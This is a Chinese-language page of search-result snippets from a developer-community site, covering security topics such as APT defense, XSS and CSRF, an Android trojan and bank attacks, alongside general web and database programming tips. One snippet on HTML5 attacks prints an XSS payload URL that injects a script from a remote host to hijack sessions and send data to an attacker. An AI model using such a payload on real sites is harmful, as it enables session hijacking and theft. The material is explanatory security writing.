- 综合排序
- 最热优先
- 最新优先
- 来自专栏技术篇
民用攻击和高级攻击防御技术的对比
面对不同类型的攻击,安全策略也必然会有所不同。过去十年间,安全服务关注的大多是普遍发生的民用攻击,而在最近两年间,高级攻击的发现与防御成为国内安全工作者的重要焦点。 但在高级网络攻击中,即便是只有一个用户被攻击,安全服务也不能轻易的将其忽叙略,因为这一个用户就有可能是一个高价值APT目标。 但在面对高级攻击时,安全服务就必须要具有关联分析和溯源分析的能力,因为只要攻击的源头还存在,那么对特定目标的攻击就不会停止。 没有大规模、详实的数据记录,就不太可能发现那些隐蔽性极强的高级攻击;同样,如果没有足够效率的数据关联分析技术,也无法真正有效地追踪攻击者的实时变化。 当我们需要在一个企业的内部网络中发现高级攻击时,就需要对这个企业内部网络的数据进行充分的采集和记录;而当我们需要在整个互联网上分析或捕获高级攻击时,则需要我们对整个互联网的数据有充分的采集和记录,并且有足够的大数据处理能力来快速的从海量数据中捞出针一样细小的高级攻击事件
33320编辑于 2022-09-22 - 来自专栏一名前端开发
webpack5高级
高级也就是相对于基础的优化。 , ["jpegtran", { progressive: true }], ["optipng", { optimizationLevel: 5 怎么用 下载包 npm i --save-dev @vue/preload-webpack-plugin 本来使用的是 preload-webpack-plugin,但其与webpack5不兼容所以采用其替代品
68740编辑于 2023-10-26 - 来自专栏明明如月的技术专栏
软考高级:主动攻击和被动攻击概念和例题
作者:明明如月学长, CSDN 博客专家,大厂高级 Java 工程师,《性能优化方法论》作者、《解锁大厂思维:剖析《阿里巴巴Java开发手册》》、《再学经典:《Effective Java》独家解析》 一、AI 解读 网络安全技术中,攻击可以大致分为两类:主动攻击和被动攻击。这两种攻击方式根据其行为特征和目标的不同,有着各自的名称和描述。 主动攻击 主动攻击是指攻击者直接对目标系统进行破坏或干扰的行为,这种攻击通常会对系统造成明显的影响或改变。 跨站脚本攻击(XSS):攻击者通过将恶意脚本注入网页,当用户浏览该页时,脚本会执行,可能窃取用户信息。 被动攻击 被动攻击是指攻击者试图获取系统的信息而不影响系统资源的行为,通常不易被发现。 跨站脚本攻击 C. 电子侦听 D. 拒绝服务攻击 中间人攻击属于以下哪类攻击? A. 主动攻击 B. 被动攻击 C. 内部攻击 D.
82500编辑于 2024-05-24 - 来自专栏FreeBuf
内网穿透:Android木马进入高级攻击阶段
其工作流程大致分为以下5步: (1)代理方向代理服务器发出请求信息。 (2)代理服务器应答。 (3)代理方需要向代理服务器发送目的IP和端口。 (4)代理服务器与目的进行连接。 (5)连接成功后将需要将代理方发出的信息传到目的方,将目的方发出的信息传到需要代理方。代理完成。 三.详细分析 该木马的主要攻击过程如下[3]: (1)木马运行时主动连接到攻击者主机(SOCKS客户端),建立一个与攻击者对话的代理通道。 这样攻击者就通过木马完成了对内网文件服务器的数据窃取。 以上攻击过程如下图所示: ? 图5黑客攻击FTP服务器,窃取数据的过程 四.总结建议 “DressCode”恶意代码穿透能力强,地域分布广泛,已成为对内网安全的一种新的潜在威胁,减除接入企业内网的智能终端设备所带来的安全威胁客不容缓
1.7K100发布于 2018-02-09 - 来自专栏前端Q
5 种高级 NodeJS 技术
在这篇文章中,我们将重点介绍 NodeJS 的五种高级技术。 所以,系好安全带,我们要开车了,准备好探索它们吧。 const port = process.env.PORT || 5001; app.listen(port, () => console.log('Server running at', port)); 5. /controllers/auth"); route.get('/login', login); 结论 在本文中,我们讨论了编写干净且易于维护的 NodeJS 代码的不同高级技术。
55420编辑于 2023-08-23 - 来自专栏前端技术江湖
5 种高级 NodeJS 技术
在这篇文章中,我们将重点介绍 NodeJS 的五种高级技术。所以,系好安全带,我们要开车了,准备好探索它们吧。 const port = process.env.PORT || 5001; app.listen(port, () => console.log('Server running at', port)); 5. /controllers/auth"); route.get('/login', login); 结论 在本文中,我们讨论了编写干净且易于维护的 NodeJS 代码的不同高级技术。
63820编辑于 2023-08-21 - 来自专栏娜姐聊前端
前端网络高级篇(五)常见网络攻击
网络安全是前端工程师需要考虑的问题,常见的网络攻击有XSS,SQL注入和CSRF等。 1. XSS XSS,Cross-site script,跨站脚本攻击。 反射型XSS攻击场景:用户点击嵌入恶意脚本的链接,攻击者可以获取用户的cookie信息或密码等重要信息,进行恶性操作。 持久型XSS攻击场景:攻击者提交含有恶意脚本的请求(通常使用<script>标签),此脚本被保存在数据库中。用户再次浏览页面,包含恶意脚本的页面会自动执行脚本,从而达到攻击效果。 下图阐述了CSRF攻击策略: ? 如果攻击者有权限在本域发布评论(含链接、图片等,统称UGC),那么它可以直接在本域发起攻击,这种情况下同源策略无法达到防护的作用。
1.6K20发布于 2020-09-22 - 来自专栏睡不着所以学编程
JavaScript高级(5) 函数进阶
我们以前定义函数的方法有两种,命名函数和匿名函数,今天学习第三种,根据大写的F我们可以看出这是一个构造函数
31120编辑于 2022-09-20 - 来自专栏狮乐园
高级 Angular 组件模式 (5)
在之前的例子中,已经出现多次使用template reference variable(模板引用变量)的场景,现在让我们来深入研究如何通过使用模板引用变量来关联某个具体指令。
92620发布于 2018-10-19 - 来自专栏狮乐园
高级 Vue 组件模式 (5)
你可以通过下面的链接来看看这个组件的实现代码以及演示: sandbox: 在线演示 github: part-5 总结 文章中所举例子的交互,在实际场景中很常见,比如: 当通过一个 icon 触发搜索框时
72210发布于 2020-01-21 - 来自专栏HACK学习
揭秘APT攻击: 网络世界的高级间谍
本质是针对性攻击 “提到APT攻击,很多人可能并不熟悉,但提到它的斑斑劣迹,大家绝不陌生。” ? 而APT攻击之所以不常见,甚至让很多人觉得距自己比较遥远,正因为它是网络世界的高级间谍。 APT组织如何频频得手 APT组织就像网络世界神秘莫测的刺客,而它的高级性恰好体现在能绕过现有防御措施,长期隐藏在网络中。 传统的防御思路往往集中在实时发现与阻断的层面,而面对高级威胁,并没有简单的办法,只有每个环节都比较强大,才有可能发现异常,如大数据收集取证、溯源、拓展分析等能力。 最近,风靡IT界的一部科幻小说《三体》中提到“黑暗森林法则”,指的是在宇宙里有不同的文明,每一种文明都不希望被更高级的文明看见。因为一旦被发现,就会有一方被消灭。这在网络攻防的世界里也同样适用。 ?
1.2K60发布于 2019-08-07 - 来自专栏自动化、性能测试
Python 高级特性(5)- 迭代器
迭代器貌似是 Python3 才有的(猜的),在廖雪峰大神的网站中 Python2 是没有迭代器一栏的
38430发布于 2021-04-23 - 来自专栏CSDNToQQCode
python的5种高级用法
Python 函数通常使用 def a_function_name() 样式来定义,但对于 lambda 函数,我们根本没为它命名。这是因为 lambda 函数的功能是执行某种简单的表达式或运算,而无需完全定义函数。
30120编辑于 2022-11-29 - 来自专栏侯哥的Python分享
Mysql高级5-SQL优化
tb_user_data.sql 1,a,aa,aaa,2023-07-01,1 2,b,bb,bbb,2023-07-02,0 3,c,cc,ccc,2023-07-03,1 4,d,dd,ddd,2023-07-04,0 5, into table tb_user 是将文件中的数据,插入到tb_user表中 说明4:fields terminated by ',' 是说每个字段之间的数据是使用','分割的 说明5: by 是age在前,salary在后,和索引的顺序不一致,仍然会触发索引,使用Using index,但是也会使用Using filesort,所以推荐大家使用正确的索引顺序的字段来进行排序 案例5: ---------+----------+--------+------+------------+---------+---------------+---------+------------+ 5 2000000页以后的数据,该查询仅好事0.51秒,比直接使用limit分页查询快了几倍 说明4:Mysql官方针对大数据量的分页查询给出的方案是,建议使用覆盖查询加子查询形式进行优化 说明5:
55630编辑于 2023-08-02 - 来自专栏前端面试笔记
React的5种高级模式
本文概述了5种现代高级React模式,包括集成代码、优点和缺点,以及在公共库中的具体用法。像每个React开发者一样,你可能已经问过自己以下问题之一我如何建立一个可重复使用的组件以适应不同的使用情况? 这些反复出现的问题催生了整个React社区的一些高级模式的出现在这篇文章中,我们将看到5种不同模式的概述。为了便于比较,我们将对所有这些模式使用一个相同的结构。 标准反转控制:3/4集成的复杂性:3/4使用此模式的公共库React tableDownshift5. State reducer 模式在控制的反转方面是最先进的模式。 标准反转控制:4/4集成的复杂性:4/4使用此模式的公共库Downshift总结通过这5个高级React模式,我们看到了利用 "控制反转 "概念的不同方式。
1.1K20编辑于 2022-10-19 - 来自专栏FreeBuf
网络攻击瞄准个人银行,谈谈5个典型攻击手段
虽然在过去几年针对银行的攻击手段变得更加复杂,但绝大多数攻击依旧依赖于用户欺骗。例如,针对银行的一种常见网络钓鱼攻击,就是将目标定向到恶意克隆的银行网站。 这一切都是为了引导用户犯错,而网络钓鱼还只是电子银行时代应该防范的攻击之一。以下介绍了黑客通过用户攻击银行的五种方式: SMS swaps攻击 短信诈骗在银行业已经非常普遍。 MITM攻击/中间人攻击 Man In-The-Middle(MITM)攻击由来已久,但非常有效,攻击者瞄准的是基础设施没有被充分保护的银行平台。 这种攻击通常用于攻击者所熟悉的组织,攻击者利用内部了解针对特定的负责付款的员工发起攻击。比如,他们可能会向会计发送一封电子邮件,表明是CFO要求他们支付一笔看似正常的款项。 以上这些攻击操作都依赖于最终的用户令牌,而银行如果MFA控件到位,攻击者将无法拿到这些令牌!
1.4K20发布于 2019-08-20 - 来自专栏浩Coding
ASP.NET MVC5高级编程 ——(5)路由
这章呢,我们开始讲ASP.NET MVC5中的路由机制,在这之前,先提一下URL(Uniform Resource Locator)-- 统一资源定位符。 ASP.NET MVC5中有:特性路由和传统路由。 ASP.NET MVC5中的路由机制图解: ? price="-1,-1", star="-1" }, new { city=@"[a-zA-Z]*",price=@"(\d)+\,(\d)+", star="[-1-5]
2.8K40发布于 2019-07-03 - 来自专栏安恒信息
揭密HTML 5带来的攻击手法
HTML5 是下一代的HTML,HTML5赋予网页更好的意义和结构。更加丰富的标签将随着对RDFa的,微数据与微格式等方面的支持,构建对程序、对用户都更有价值的数据驱动的Web。 基于HTML5开发的网页APP拥有更短的启动时间,更快的联网速度。本文详细介绍了HTML5的普及,带来的新的安全威胁。 利用跨站脚本攻击或浏览器地址栏注入javascript以后,Shell of the Future可进行劫持会话。 txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E 7、当用户点击之后,攻击者的IP地址将会发送给攻击者 5、该javascript代码会发送一个XMLHttpRequest请求。 6、分析返回的数据包,并把它发送到攻击者的服务器。 7、攻击者获取到公司内部站点的相关信息。
1K50发布于 2018-04-09 - 来自专栏ascii0x03的安全笔记
HTML5离线缓存攻击测试
攻击者由安装有XAMPP服务器的桥接虚拟机表示,IP为192.168.1.154。 攻击者可以访问本目录的demo_html.appcache获得缓存文件,在同名文件加入自己的恶意代码(这里是弹出hacked对话框),利用DNS欺骗、中间人等方式,这里将HOSTS文件更改为192.168.1.154 接下来,修改HOSTS文件为192.168.1.113 www.cache-test.com,模拟用户已经回到了安全的上网环境下,当用户再次访问该合法网站时,仍然出现的是上述攻击者的页面。 通过Wireshark抓包可以看到,浏览器仅仅请求了demo_html.appcache,离线缓存攻击成功。注意在实验时需要排除浏览器本身缓存的影响,仅仅刷新页面会收到服务器返回的304响应。 由于时间有限,并没有用爬虫去找使用了HTML5离线缓存的网站,仅仅做了这种攻击的验证实验,若有大家可以推荐几个来测试。 主页htm: <!
2.1K90发布于 2018-04-12 - 来自专栏centosDai
HTML5(六)——Canvas 高级操作
上一篇文章《HTML5(五)——Canvas API》介绍 canvas 绘制基本图形,这节开始介绍canvas的高级操作。 requestAnimationFrame(next) } function next(){ ctx.clearRect(0,0,canvas.width,canvas.height) if(frameCounter%5
1.7K30发布于 2021-11-26
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号